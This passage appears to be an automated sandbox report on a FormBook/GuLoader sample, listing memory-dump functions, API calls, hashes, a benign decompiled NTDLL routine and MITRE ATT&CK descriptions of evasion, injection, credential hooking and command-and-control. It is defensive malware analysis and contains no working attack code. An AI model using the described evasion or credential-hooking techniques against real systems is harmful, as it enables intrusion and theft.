Instruction Fuzzy Hash: 2AE06D373D02043AE33065A9AC02FA7B39C8B81B24F154026FB4DEB2C1E595F40146A4

Uniqueness

Uniqueness Score: -1.00%

Function 02EFA620, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(02EF4526,?,02EF4C9F,02EF4C9F,?,02EF4526,?,?,?,?,?,00000000,00000000,?), ref: 02EFA64D

Memory Dump Source

Source File: 0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp, Offset: 02EE0000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: 3e57cebfc66f21a6bc7802524e75850351932e7c214912d0f5d4bd9b78c51d81
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 14E012B2200208AFDB14EF99CC40EA777ADAF88654F118558BA1C5B241C630F9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 02EFA7C0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,02EEF1C2,02EEF1C2,?,00000000,?,?), ref: 02EFA7F0

Memory Dump Source

Source File: 0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp, Offset: 02EE0000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 9d5d0afd04c2e2519f668bf15179b91e5c676535f67546311c5e77fce1c3de99
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 3AE01AB22002086FDB10EF49CC84EE737ADAF88650F018164BA0C5B241C930E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 02EEF6C0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,02EE8D14,?), ref: 02EEF6EB

Memory Dump Source

Source File: 0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp, Offset: 02EE0000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
Instruction ID: dd76869a2066379885e60fe7ed851c350bb1cec90a3462673a9b5336f6e117dc
Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
Instruction Fuzzy Hash: E2D05E666903082BEA10BAA49C02F2732895B44A04F498064FA499B2C3E954E1004565

Uniqueness

Uniqueness Score: -1.00%

Function 04FD967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FD9694

Memory Dump Source

Source File: 0000000F.00000002.771684624.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: true

Associated: 0000000F.00000002.772093256.000000000508B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.772110297.000000000508F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d9b43f7225f102851f5f17dbf315b690ea6f7628100e0c51d2f85c92bf27cdb3
Instruction ID: 2122a3a5c0b7131ab5e42ed079cb9a3a5bb101beddd0114d4c40b608cf8c4d00
Opcode Fuzzy Hash: d9b43f7225f102851f5f17dbf315b690ea6f7628100e0c51d2f85c92bf27cdb3
Instruction Fuzzy Hash: 9EB09BB1D414C5C5F711D7B54E08B37790177D0745F16C051D1021685A4778D492F6B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02EE7B1B, Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp, Offset: 02EE0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d46c94caf1edea3ab26f397e736487f56cf080a535bd56babbab541ff70c9e1a
Instruction ID: 311ec508830105643a7c5a54b68992e8217b531314a574c31a829fea89597f95
Opcode Fuzzy Hash: d46c94caf1edea3ab26f397e736487f56cf080a535bd56babbab541ff70c9e1a
Instruction Fuzzy Hash: 95C0127255A54547D710491DAC41174FB7CD7531BCF142397ED94A75614182849243E6

Uniqueness

Uniqueness Score: -1.00%

Function 0502FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0502FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E04FDCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E05025720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E05025720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x0502fdda
0x0502fde2
0x0502fde5
0x0502fdec
0x0502fdfa
0x0502fdff
0x0502fe0a
0x0502fe0f
0x0502fe17
0x0502fe1e
0x0502fe19
0x0502fe19
0x0502fe19
0x0502fe20
0x0502fe21
0x0502fe22
0x0502fe25
0x0502fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0502FDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0502FE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0502FE2B

Memory Dump Source

Source File: 0000000F.00000002.771684624.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: true

Associated: 0000000F.00000002.772093256.000000000508B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.772110297.000000000508F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: efd9e37d9e495a807bd453870d49073d990410387ddd479653a64c5135c3f5f1
Instruction ID: aa87f40852e598dbc3a6cb66e37b3f496e878f85fb6673de3aebad160212af71
Opcode Fuzzy Hash: efd9e37d9e495a807bd453870d49073d990410387ddd479653a64c5135c3f5f1
Instruction Fuzzy Hash: 5EF0F672240211BFEB212A45EC06F77BB6AEB44770F150314FA285A1D1DA62FC2096F4

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report RYATPPETU.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Threatname: GuLoader

Yara Overview

Memory Dumps

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets